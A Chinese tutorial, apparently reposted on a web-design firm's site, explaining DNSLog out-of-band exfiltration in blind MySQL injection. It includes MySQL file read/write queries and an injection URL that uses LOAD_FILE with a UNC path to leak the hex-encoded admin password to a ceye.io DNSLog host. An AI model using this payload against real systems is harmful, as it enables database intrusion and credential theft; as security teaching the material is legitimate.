DNSLog在MySQL注入中的方法是什么
这篇文章主要介绍“DNSLog在MySQL注入中的方法是什么”,在日常操作中,相信很多人在DNSLog在MySQL注入中的方法是什么问题上存在疑惑,小编查阅了各式资料,整理出简单好用的操作方法,希望对大家解答”DNSLog在MySQL注入中的方法是什么”的疑惑有所帮助!接下来,请跟着小编一起来学习吧!
十堰网站制作公司哪家好,找创新互联!从网页设计、网站建设、微信开发、APP开发、成都响应式网站建设等网站项目制作,到程序开发,运营维护。创新互联成立与2013年到现在10年的时间,我们拥有了丰富的建站经验和运维经验,来保证我们的工作的顺利进行。专注于网站建设就选创新互联。
关于DNSlog在Web攻击的利用
简单理解就是在某些无法直接利用漏洞获得回显的情况下,但是目标可以发起DNS请求,这个时候可以通过DNSlog这种方式把想获得的数据外带出来。
常用在哪些情况下
SQL注入中的盲注
无回显的命令执行
无回显的SSRF
DNSlog攻击的基本原理
作为攻击者,提交注入语句,让数据库把需要查询的值和域名拼接起来,然后发生DNS查询,我们只要能获得DNS日志,就得到了想要的值。所以我们需要有一个自己的域名,然后再域名商处配置一条NS记录,然后我们在NS服务器上获取DNS日志即可。
DNSLOG在MySQL数据库中SQL注入的实战
本次演示一个最常见的注入场景,就是WHERE后面条件处的注入。实验环境有一个test_user表,三个字段id、user、pass。如下
id | user | pass |
---|---|---|
1 | admin | admin123 |
最后就不再自己搭建一个DNS服务器了,直接用ceye.io这个平台,这个平台就集成了Dnslog的功能。
需要条件
MySQL开启
load_file()
DNSLog平台(hyuga、CEYE)
Windows平台
Mysql服务端文件读写
条件:服务端配置可读写目录和正确的用户权限。
安全保护
mysql服务端的文件读取有很多的条件限制,主要是mysql数据库的配置,为了安全原因,当读取位于服务器上的文本文件时,文件必须处于数据库目录可被所有人读取。你可以通过执行show variables like '%secure%'
来查看。
secure-file-priv
参数是用来限制LOAD DATA
,SELECT ... OUTFILE
,DUMPFILE
和LOAD_FILE()
可以操作的文件夹。
secure-file-priv
的值可以分为三种情况:
secure-file-priv
的值为null,表示显示mysqld不允许导入|导出secure-file-priv
的值为/tmp/
,表示限制mysqld的导入|导出只能发生在/tmp/
目录下,此时如果读写发生在其他文件夹中,就会报错当
secure-file-priv
的值没有具体值,表示不对mysqld
的导入|导出做限制。
除此之外,读取或写入文件必须拥有可操作的用户权限否则会报错。
ERROR 1045 (28000): Access denied for user
读取文件
SELECT LOAD_FILE('/var/lib/mysql-files/aaa') AS Result;
create database test; create table test (id TEXT, content TEXT); load data infile "/var/lib/mysql-files/aaa" into table test.test FIELDS TERMINATED BY '\n\r';
写入文件
select group_concat(id) from test INTO DUMPFILE "/var/lib/mysql-files/aaaaa";
load_file
MySQL应该是在实战中利用DNSLOG最多的。
在MySQL中,有一个load_file
函数可以用来读取本地的文件。
http://127.0.0.1/mysql.php?id=1 union select 1,2,load_file(concat('\\\\',(SELECT hex(pass) FROM test.test_user WHERE user='admin' LIMIT 1),'.mysql.nk40ci.ceye.io\\abc'))
可以看到test_user中的pass字段的值的Hex码就被查询出来了,为什么这个地方Hex编码的目的就是减少干扰,因为很多时候数据库字段的值可能是有特殊符号的,这些特殊符号拼接在域名里是无法做DNS查询的,因为域名有一定的规范,有些特殊符号是不能带入的。
注意:load_file
函数再Linux下是无法用来做DNSLOG攻击的,因为这里就涉及到Windows的UNC路径。
UNC路径
百度的UNC路径的解释
UNC是一种命名惯例, 主要用于在Microsoft Windows上指定和映射网络驱动器. UNC命名惯例最多被应用于在局域网中访问文件服务器或者打印机。我们日常常用的网络共享文件就是这个方式。
其实我们平常在Windows中用共享文件的时候就会用到这种网络地址的形式
\\sss.xxx\test\
这也就解释了为什么CONCAT()函数拼接了4个\
了,因为转义的原因,4个\
就变成了2个\
,目的就是利用UNC路径。
因为Linux没有UNC路径这个东西,所以当MySQL处理Linux系统中的时候,是不能用这种方式外带数据的。
到此,关于“DNSLog在MySQL注入中的方法是什么”的学习就结束了,希望能够解决大家的疑惑。理论与实践的搭配能更好的帮助大家学习,快去试试吧!若想继续学习更多相关知识,请继续关注创新互联网站,小编会继续努力为大家带来更多实用的文章!
网页标题:DNSLog在MySQL注入中的方法是什么
地址分享:http://scyanting.com/article/gjdcei.html